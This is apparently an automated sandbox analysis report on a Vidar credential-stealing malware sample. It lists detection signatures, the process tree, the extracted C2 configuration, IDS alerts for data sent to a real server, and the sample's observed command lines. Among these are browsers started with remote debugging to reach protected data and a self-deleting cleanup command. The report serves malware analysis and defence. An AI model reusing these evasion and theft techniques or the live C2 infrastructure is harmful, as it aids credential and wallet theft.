Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ktyihkdfesf.exe

Overview

General Information

Sample name:ktyihkdfesf.exe
Analysis ID:1578709
MD5:cc36e2a5a3c64941a79c31ca320e9797
SHA1:50c8f5db809cfec84735c9f4dcd6b55d53dfd9f5
SHA256:6fec179c363190199c1dcdf822be4d6b1f5c4895ebc7148a8fc9fa9512eeade8
Tags:exeVidaruser-lontze7
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Monitors registry run keys for changes
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • ktyihkdfesf.exe (PID: 1468 cmdline: "C:\Users\user\Desktop\ktyihkdfesf.exe" MD5: CC36E2A5A3C64941A79C31CA320E9797)
    • chrome.exe (PID: 6856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 6832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2348,i,3398562599031357926,1603104178569398074,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 7680 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 6400 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2228,i,2139828529892091342,11985651726309101408,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • cmd.exe (PID: 8764 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\K6FKFCT00ZU3" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8696 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • msedge.exe (PID: 8052 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 2168 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2996 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8356 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6600 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8368 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6744 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 8548 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 8596 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • msedge.exe (PID: 8956 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6792 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ktyihkdfesf.exeJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: ktyihkdfesf.exe PID: 1468JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: ktyihkdfesf.exe PID: 1468JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: ktyihkdfesf.exe PID: 1468JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.ktyihkdfesf.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.0.ktyihkdfesf.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Browser Started with Remote Debugging
                  Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\ktyihkdfesf.exe", ParentImage: C:\Users\user\Desktop\ktyihkdfesf.exe, ParentProcessId: 1468, ParentProcessName: ktyihkdfesf.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6856, ProcessName: chrome.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-20T07:31:11.495790+010020442471Malware Command and Control Activity Detected116.203.12.114443192.168.2.649729TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-20T07:31:13.791133+010020518311Malware Command and Control Activity Detected116.203.12.114443192.168.2.649742TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-20T07:31:09.191655+010020490871A Network Trojan was detected192.168.2.649722116.203.12.114443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-20T07:31:06.772119+010028593781Malware Command and Control Activity Detected192.168.2.649716116.203.12.114443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: ktyihkdfesf.exeMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                  Multi AV Scanner detection for submitted file
                  Source: ktyihkdfesf.exeVirustotal: Detection: 45%Perma Link
                  Source: ktyihkdfesf.exeReversingLabs: Detection: 55%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: ktyihkdfesf.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004078F0 StrStrA,lstrlenA,LocalAlloc,CryptUnprotectData,LocalAlloc,LocalFree,lstrlenA,0_2_004078F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004116B0 CryptBinaryToStringA,HeapAlloc,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,HeapFree,GetProcessHeap,HeapFree,0_2_004116B0
                  Source: ktyihkdfesf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49778 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.6:49715 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49796 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49841 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49960 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50022 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50061 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50103 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50154 version: TLS 1.2
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00409460 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,FindClose,0_2_00409460
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00407060 FindFirstFileA,strlen,FindFirstFileA,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_004170D0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00401730 FindFirstFileA,FindFirstFileA,FindClose,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,FindFirstFileA,FindFirstFileA,DeleteFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00401730
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0040A5D0 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,0_2_0040A5D0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00414BD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,lstrcatA,lstrcatA,0_2_00414BD0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00406FE0 FindFirstFileA,FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,0_2_00406FE0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0040C790 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040C790
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_004081B0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0040BC30 wsprintfA,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrlenA,lstrlenA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040BC30
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00415700 HeapAlloc,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,_invalid_parameter_noinfo_noreturn,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,0_2_00415700
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: chrome.exeMemory has grown: Private usage: 1MB later: 30MB

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.6:49722 -> 116.203.12.114:443
                  Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.6:49716 -> 116.203.12.114:443
                  Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.6:49729
                  Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.114:443 -> 192.168.2.6:49742
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                  Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 52.178.17.2 52.178.17.2
                  Source: Joe Sandbox ViewIP Address: 116.203.12.114 116.203.12.114
                  Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                  Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                  Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49778 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00404280 InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00404280
                  Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239360433542_1UJC4903W7XNIUU73&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239360433543_1F4HJPO10Z3VYH0SK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239359955653_16Q8BS61PKT108CUW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239359955652_1UH15L5Z2LXM3P8PA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381681309_1UONBZH0MSLU4XT86&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381681310_13V04GE58D8UEEUDW&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239317301222_1FJU5PIOORZE0KYBN&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
